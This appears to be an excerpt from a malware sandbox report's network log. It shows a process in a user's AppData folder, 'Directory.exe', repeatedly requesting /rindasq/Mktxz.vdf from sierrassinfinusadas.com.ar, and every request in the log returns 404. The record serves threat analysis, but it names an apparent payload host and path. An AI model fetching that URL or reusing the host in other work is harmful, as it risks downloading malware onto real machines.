                                                        2024-11-21 11:56:23 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        32192.168.2.649937167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:56:25 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:56:25 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:56:25 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:56:25 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        33192.168.2.649944167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:56:27 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:56:28 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:56:27 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:56:28 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        34192.168.2.649950167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:56:29 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:56:30 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:56:30 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:56:30 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        35192.168.2.649958167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:56:32 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:56:32 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:56:32 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:56:32 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        36192.168.2.649964167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:56:34 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:56:35 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:56:34 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:56:35 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        37192.168.2.649971167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:56:36 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:56:37 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:56:37 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:56:37 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        38192.168.2.649977167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:56:38 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:56:39 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:56:39 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:56:39 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        39192.168.2.649985167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:56:41 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:56:41 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:56:41 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:56:41 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        40192.168.2.649992167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:56:43 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:56:43 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:56:43 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:56:43 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        41192.168.2.649997167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:56:45 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:56:46 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:56:45 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:56:46 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        42192.168.2.650004167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:56:47 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:56:48 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:56:47 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:56:48 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        43192.168.2.650010167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:56:49 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:56:50 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:56:50 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:56:50 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        44192.168.2.650016167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:56:51 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:56:52 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:56:52 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:56:52 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        45192.168.2.650027167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:56:54 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:56:55 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:56:54 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
